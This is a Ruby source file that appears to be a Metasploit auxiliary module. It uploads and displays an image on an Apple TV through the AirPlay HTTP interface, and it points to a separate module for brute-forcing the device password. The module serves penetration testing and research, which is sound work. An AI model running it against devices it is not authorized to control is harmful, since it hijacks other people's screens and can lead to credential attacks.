117 lines
3.6 KiB
Ruby
117 lines
3.6 KiB
Ruby
|
##
|
||
|
# This module requires Metasploit: http//metasploit.com/download
|
||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||
|
##
|
||
|
|
||
|
require 'msf/core'
|
||
|
|
||
|
class Metasploit4 < Msf::Auxiliary
|
||
|
|
||
|
include Msf::Exploit::Remote::HttpClient
|
||
|
|
||
|
def initialize(info = {})
|
||
|
super(update_info(info,
|
||
|
'Name' => 'Apple TV Image Remote Control',
|
||
|
'Description' => %q(
|
||
|
This module will show an image on an AppleTV device for a period of time.
|
||
|
Some AppleTV devices are actually password-protected, in that case please
|
||
|
set the PASSWORD datastore option. If you need to bruteforce the password,
|
||
|
you can try apple_login.rb.
|
||
|
),
|
||
|
'Author' =>
|
||
|
[
|
||
|
'0a29406d9794e4f9b30b3c5d6702c708', # Original work
|
||
|
'sinn3r' # You can blame me for mistakes
|
||
|
],
|
||
|
'References' =>
|
||
|
[
|
||
|
['URL', 'http://nto.github.io/AirPlay.html']
|
||
|
],
|
||
|
'DefaultOptions' => { 'USERNAME' => 'AirPlay' },
|
||
|
'License' => MSF_LICENSE
|
||
|
))
|
||
|
|
||
|
# Make the PASSWORD option more visible and hope the user is more aware of this option
|
||
|
register_options([
|
||
|
Opt::RPORT(7000),
|
||
|
OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),
|
||
|
OptPath.new('FILE', [true, 'Image to upload and show']),
|
||
|
OptString.new('PASSWORD', [false, 'The password for AppleTV AirPlay'])
|
||
|
], self.class)
|
||
|
|
||
|
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
|
||
|
# so deregister them so we don't overwhelm the user with fake options.
|
||
|
deregister_options(
|
||
|
'HTTP::uri_encode_mode', 'HTTP::uri_full_url', 'HTTP::pad_method_uri_count',
|
||
|
'HTTP::pad_uri_version_count', 'HTTP::pad_method_uri_type', 'HTTP::pad_uri_version_type',
|
||
|
'HTTP::method_random_valid', 'HTTP::method_random_invalid', 'HTTP::method_random_case',
|
||
|
'HTTP::uri_dir_self_reference', 'HTTP::uri_dir_fake_relative', 'HTTP::uri_use_backslashes',
|
||
|
'HTTP::pad_fake_headers', 'HTTP::pad_fake_headers_count', 'HTTP::pad_get_params',
|
||
|
'HTTP::pad_get_params_count', 'HTTP::pad_post_params', 'HTTP::pad_post_params_count',
|
||
|
'HTTP::uri_fake_end', 'HTTP::uri_fake_params_start', 'HTTP::header_folding',
|
||
|
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'NTLM::SendLM', 'NTLM::SendNTLM',
|
||
|
'NTLM::SendSPN', 'NTLM::UseLMKey', 'DOMAIN', 'DigestAuthIIS', 'VHOST'
|
||
|
)
|
||
|
end
|
||
|
|
||
|
|
||
|
#
|
||
|
# Sends an image request to AppleTV. HttpClient isn't used because we actually need to keep
|
||
|
# the connection alive so that the video can keep playing.
|
||
|
#
|
||
|
def send_image_request(opts)
|
||
|
begin
|
||
|
http = Rex::Proto::Http::Client.new(
|
||
|
rhost,
|
||
|
rport.to_i,
|
||
|
{
|
||
|
'Msf' => framework,
|
||
|
'MsfExploit' => self
|
||
|
},
|
||
|
ssl,
|
||
|
ssl_version,
|
||
|
proxies,
|
||
|
datastore['USERNAME'],
|
||
|
datastore['PASSWORD']
|
||
|
)
|
||
|
|
||
|
http.set_config('agent' => datastore['UserAgent'])
|
||
|
|
||
|
req = http.request_raw(opts)
|
||
|
res = http.send_recv(req)
|
||
|
|
||
|
sleep(datastore['TIME']) if res.code == 200
|
||
|
http.close
|
||
|
ensure
|
||
|
cleanup
|
||
|
end
|
||
|
end
|
||
|
|
||
|
|
||
|
def get_image_data
|
||
|
File.open(datastore['FILE'], 'rb') { |f| f.read(f.stat.size) }
|
||
|
end
|
||
|
|
||
|
|
||
|
def show_image
|
||
|
image = get_image_data
|
||
|
|
||
|
opts = {
|
||
|
'method' => 'PUT',
|
||
|
'uri' => '/photo',
|
||
|
'data' => image
|
||
|
}
|
||
|
|
||
|
# The connection has to stay alive but we don't have to stare at the screen and
|
||
|
# wait for it to finish.
|
||
|
framework.threads.spawn("AppleTvImageRequest", false) {
|
||
|
send_image_request(opts)
|
||
|
}
|
||
|
end
|
||
|
|
||
|
|
||
|
def run
|
||
|
print_status("Image request sent. Duration set: #{datastore['TIME']} seconds")
|
||
|
show_image
|
||
|
end
|
||
|
end
|